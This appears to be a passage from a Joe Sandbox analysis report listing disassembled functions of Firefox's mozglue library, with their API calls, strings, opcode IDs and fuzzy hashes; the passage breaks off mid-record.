Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: b3c2aaabd61eda546341521196df6c7e54dfdbda35a9f9e95e2d8d1d1dcca46a
Instruction ID: cb0ec035ce4b9efacb4dbff62892eef38646309400db2f14f62f15c3d38fae7b
Opcode Fuzzy Hash: b3c2aaabd61eda546341521196df6c7e54dfdbda35a9f9e95e2d8d1d1dcca46a
Instruction Fuzzy Hash: 4B418BB58002149FCB10CF69E855A9ABFF6FF89318F40452EEA9A93740D731E855CF91

Function 665E7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 665E7EA7
malloc.MOZGLUE(00000001), ref: 665E7EB3

Part of subcall function 665ECAB0: EnterCriticalSection.KERNEL32(?), ref: 665ECB49
Part of subcall function 665ECAB0: LeaveCriticalSection.KERNEL32(?), ref: 665ECBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 665E7EC4
mozalloc_abort.MOZGLUE(?), ref: 665E7F19
malloc.MOZGLUE(?), ref: 665E7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 665E7F4D

Strings

d, xrefs: 665E7F89

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 7ed4046f19f3a6a6a5880d8c614cd572f394709943017f99f364e48593918e27
Instruction ID: 03674cb778c85600ec33652277e4799b21ca3a1ec85d92de976a741362459337
Opcode Fuzzy Hash: 7ed4046f19f3a6a6a5880d8c614cd572f394709943017f99f364e48593918e27
Instruction Fuzzy Hash: A031F661D0039897DF01DF69EC059BEBB6AEFD6208F049229EE5957212FB31A984C390

Function 6663AAB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6665E220,?), ref: 6663BC2D
ReleaseSRWLockExclusive.KERNEL32(6665E220), ref: 6663BC42
RtlFreeHeap.NTDLL(?,00000000,6664E300), ref: 6663BC82
RtlFreeUnicodeString.NTDLL(6665E210), ref: 6663BC91
RtlFreeUnicodeString.NTDLL(6665E208), ref: 6663BCA3
RtlFreeHeap.NTDLL(?,00000000,6665E21C), ref: 6663BCD2
free.MOZGLUE(?), ref: 6663BCD8

Strings

,ef, xrefs: 6663AABA

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID: ,ef
API String ID: 3047341122-1608801504
Opcode ID: ac230605d73c4f6b93d99e091c4ca09563c664726dca14451da813bddd88648b
Instruction ID: 9139c9ac7382a83cfad30c9f6ad082e6dd2f1a91c28b296dea9179fde8609d30
Opcode Fuzzy Hash: ac230605d73c4f6b93d99e091c4ca09563c664726dca14451da813bddd88648b
Instruction Fuzzy Hash: BF21F5729007258FE7209F06EC81B66BBA9FF91714F05846DE51A6B610CB31F845CB90

Function 665E3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 665E3EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 665E3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 665E4006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 665E40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,665E3CCC), ref: 665E40AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,665E3CCC), ref: 665E40C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 665E4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,665E3CCC), ref: 665E4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,665E3CCC), ref: 665E4157

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: a349fc0a8c5abd087c27fada3d1d1af2018b3388ddc94d284c0ed210815a60db
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 22A180B1A00215CFEB40CF68C881659BBB5FF98314F2544A9D919AF352D775EC86CFA0

Function 665D2030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,665F3F47,?,?,?,665F3F47,665F1A70,?), ref: 665D207F
memset.VCRUNTIME140(?,000000E5,665F3F47,?,665F3F47,665F1A70,?), ref: 665D20DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,665F3F47,665F1A70,?), ref: 665D211A
EnterCriticalSection.KERNEL32(6665E744,?,665F3F47,665F1A70,?), ref: 665D2145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,665F3F47,665F1A70,?), ref: 665D21BA
EnterCriticalSection.KERNEL32(6665E744,?,665F3F47,665F1A70,?), ref: 665D21E0
LeaveCriticalSection.KERNEL32(6665E744,?,665F3F47,665F1A70,?), ref: 665D2232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 665D2253, 665D2268
MOZ_CRASH(), xrefs: 665D227D

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 0aac97339b41c6626f0cbe238a3c8c1cfc7d5d9e7837682d3a33a218c620541b
Instruction ID: 4f1e56208f0e68e1d0b4db2d37925c373453862cfe724917a09e139bafbe1089
Opcode Fuzzy Hash: 0aac97339b41c6626f0cbe238a3c8c1cfc7d5d9e7837682d3a33a218c620541b
Instruction Fuzzy Hash: 5561D032E002168FDB04CEADDD96B6E76B2AF85354F158139EB25A72C4E7719C00CB99

Function 66629D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,66628273), ref: 66629D65
free.MOZGLUE(66628273,?), ref: 66629D7C
free.MOZGLUE(?,?), ref: 66629D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 66629E0F
free.MOZGLUE(6662946B,?,?), ref: 66629E24
free.MOZGLUE(?,?,?), ref: 66629E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 66629EC8
free.MOZGLUE(6662946B,?,?,?), ref: 66629EDF
free.MOZGLUE(?,?,?,?), ref: 66629EF5

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 834e3d18b12770653cbf3032097f749424cfa5348273ddfe888fd36fdfdc46cd
Instruction ID: 0b2734e1a74af060692bdb635b075c844b6ae2d23f965ffcb1071261f7ed7cad
Opcode Fuzzy Hash: 834e3d18b12770653cbf3032097f749424cfa5348273ddfe888fd36fdfdc46cd
Instruction Fuzzy Hash: FE71AE70905B418BD716CF19D88155BFBF9FFD9318B409A59E98A5B202EB30E882CFC1

Function 6662DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6662DDCF

Part of subcall function 6660FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6660FA4B

Part of subcall function 666290E0: free.MOZGLUE(?,00000000,?,?,6662DEDB), ref: 666290FF
Part of subcall function 666290E0: free.MOZGLUE(?,00000000,?,?,6662DEDB), ref: 66629108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6662DE0D
free.MOZGLUE(00000000), ref: 6662DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6662DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6662DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6662DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6661DEFD,?,665E4A68), ref: 6662DF32

Part of subcall function 6662DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6662DB86
Part of subcall function 6662DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6662DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6661DEFD,?,665E4A68), ref: 6662DF65
free.MOZGLUE(?), ref: 6662DF80

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: fde941aab78adef99e3310530f72db3f2d34d43282c38f848afb7cd69ef25fc9
Instruction ID: 5c9ba220f3c3a03a24bd7f6b5cf963ea09542515fb2aff73729608c11d2fccf5
Opcode Fuzzy Hash: fde941aab78adef99e3310530f72db3f2d34d43282c38f848afb7cd69ef25fc9
Instruction Fuzzy Hash: 5351B172A006519BD7108A28E8816AFBBBBBFE1308F85451DD99A53300DB31F916CFC6

Function 6662AB90 Relevance: 13.6, APIs: 9, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6662ABB4
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662ABC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662AC06
GetCurrentThreadId.KERNEL32 ref: 6662AC16
AcquireSRWLockExclusive.KERNEL32(?), ref: 6662AC27
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6662AC66
free.MOZGLUE(?), ref: 6662AD19
free.MOZGLUE(00000000), ref: 6662AD2B
?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6662AD38

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
String ID:
API String ID: 2167474191-0
Opcode ID: c94099bafe5fb6a70ec8cc9e667b1e2fd74ffdae778a06896feb00eef8b9c06a
Instruction ID: 677cd76bc7903eca8fac97e7fcf3f8f1e7a8102c700afa43ac59ebf3c0f3200f
Opcode Fuzzy Hash: c94099bafe5fb6a70ec8cc9e667b1e2fd74ffdae778a06896feb00eef8b9c06a
Instruction Fuzzy Hash: 56513674600B058FC724DF25D48876ABBFABF89714F204A2DD9AA87750DB71B844CB81

Function 6662CB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6662BCAE,?,?,6661DC2C), ref: 6662CB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 6662CB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 6662CB8D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 6662CBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 6662CBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 6662CBE9
std::_Facet_Register.LIBCPMT ref: 6662CBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 6662CC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6662BCAE,?,?,6661DC2C), ref: 6662CC65

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: d91c591f518c4153bf664444142dd5322f2d493a94eeef7b11c0aa8e172cab87
Instruction ID: 7762485bfbe1a8009a120d5d9063cc5c08568fed07ecf89913c5e105d221f0da
Opcode Fuzzy Hash: d91c591f518c4153bf664444142dd5322f2d493a94eeef7b11c0aa8e172cab87
Instruction Fuzzy Hash: 8241AF74B002158FCB00DF65E8D9A6E7BBAEF89755F044068EA0A9B351DB35EC04CF91

Function 66635D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,66635C8C,?,6660E829), ref: 66635D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,66635C8C,?,6660E829), ref: 66635D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,66635C8C,?,6660E829), ref: 66635D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,66635C8C,?,6660E829), ref: 66635D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,66635C8C,?,6660E829), ref: 66635DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,66635C8C,?,6660E829), ref: 66635DC9
std::_Facet_Register.LIBCPMT ref: 66635DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,66635C8C,?,6660E829), ref: 66635E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,66635C8C,?,6660E829), ref: 66635E45

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: c352d16d87bc13934d51d97e48cbdf0b72495d1389c4ffe486e19f2652d68851
Instruction ID: 8ba6fda02b41bcba40726b6bd8e73e221c32b8c41b109697db59db8ed076c787
Opcode Fuzzy Hash: c352d16d87bc13934d51d97e48cbdf0b72495d1389c4ffe486e19f2652d68851
Instruction Fuzzy Hash: 93416E30A003258FCB04DF65EC99AAE7BB6EF89314F444029E606A7391DB30E805CFA5

Function 6660CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,665D31A7), ref: 6660CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6660CFA4, 6660CFB8
<jemalloc>, xrefs: 6660CF9F, 6660CFB3

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: d73ba47524f5538be58c492cde550f14ffa9dc16e75417c6174c281ccd500c6c
Instruction ID: ee150a0cd47157100e3ee31cdbc0080cffa8017b421f318bef451ae59eed5d0a
Opcode Fuzzy Hash: d73ba47524f5538be58c492cde550f14ffa9dc16e75417c6174c281ccd500c6c
Instruction Fuzzy Hash: A5319430B402555BEF18DEA9ED56BAE7B7AAFC1755F104024F612AB280DB70D510CBA1

Function 665DBAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 665DBC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 665DBD06

Strings

y, xrefs: 665DBC4E
0, xrefs: 665DBBCD
0, xrefs: 665DBC74

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: ddb915598d5b83656b4116b1ee32112589a3be23b2a0ad2e40336baf25e0a191
Instruction ID: 9802658090ee856542f0de347658d73c3e34c00d2efb5c468dde7b4a778408be
Opcode Fuzzy Hash: ddb915598d5b83656b4116b1ee32112589a3be23b2a0ad2e40336baf25e0a191
Instruction Fuzzy Hash: F961C4B1A183458FD714DF2CC88265BBBE6FFD9348F008A2DE88597291DB30D945CB86

Function 665DECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 665DF100: LoadLibraryW.KERNEL32(shell32,?,6664D020), ref: 665DF122
Part of subcall function 665DF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 665DF132

moz_xmalloc.MOZGLUE(00000012), ref: 665DED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 665DEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 665DEDCC
CreateFileW.KERNEL32 ref: 665DEE08
free.MOZGLUE(00000000), ref: 665DEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 665DEE32

Part of subcall function 665DEB90: moz_xmalloc.MOZGLUE(00000104), ref: 665DEBB5
Part of subcall function 665DEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6660D7F3), ref: 665DEBC3
Part of subcall function 665DEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6660D7F3), ref: 665DEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 665DEDC1

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 881166a3f126e800c4ac24fd58bb70affa42203380fb11a8ac5ba9f17c97aec4
Instruction ID: e522a2bff6f902c201030664fb83dc1ecde7340957aef45ffe51d9835ae2e7c3
Opcode Fuzzy Hash: 881166a3f126e800c4ac24fd58bb70affa42203380fb11a8ac5ba9f17c97aec4
Instruction Fuzzy Hash: DB51D571D043958BDB00EF68DC427AEFBB1EF99318F44842DD8556B280EB30AD44CBA6

Function 665E0A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6663B80C,00000000,?,?,665E003B,?), ref: 665E0A72

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

moz_xmalloc.MOZGLUE(?,?,6663B80C,00000000,?,?,665E003B,?), ref: 665E0AF5
free.MOZGLUE(00000000,?,?,6663B80C,00000000,?,?,665E003B,?), ref: 665E0B9F
free.MOZGLUE(?,?,?,6663B80C,00000000,?,?,665E003B,?), ref: 665E0BDB
free.MOZGLUE(00000000,?,?,6663B80C,00000000,?,?,665E003B,?), ref: 665E0BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6663B80C,00000000,?,?,665E003B,?), ref: 665E0C0A

Strings

alloc overflow, xrefs: 665E0C05

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: 1d8ff4555fb2de4eb0823e5bbfd47431e900a1f0523c5d3d432b7bdd1a036a12
